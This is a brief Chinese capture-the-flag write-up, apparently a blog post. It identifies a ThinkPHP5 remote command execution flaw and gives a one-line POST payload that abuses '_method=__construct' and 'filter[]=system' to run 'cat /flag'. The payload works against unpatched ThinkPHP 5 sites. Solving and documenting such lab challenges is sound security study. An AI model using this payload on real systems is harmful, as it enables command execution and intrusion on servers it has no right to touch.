题目提示是thinkphp5,直接搜索thinkphp5的漏洞
发现thinkphp5有远程命令执行漏洞,详细如下文章
https://www.freebuf.com/vuls/194105.html
payload:
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
标签:__,www,old,thinkphp5,2nd,漏洞,hack
来源: https://www.cnblogs.com/gtx690/p/13258994.html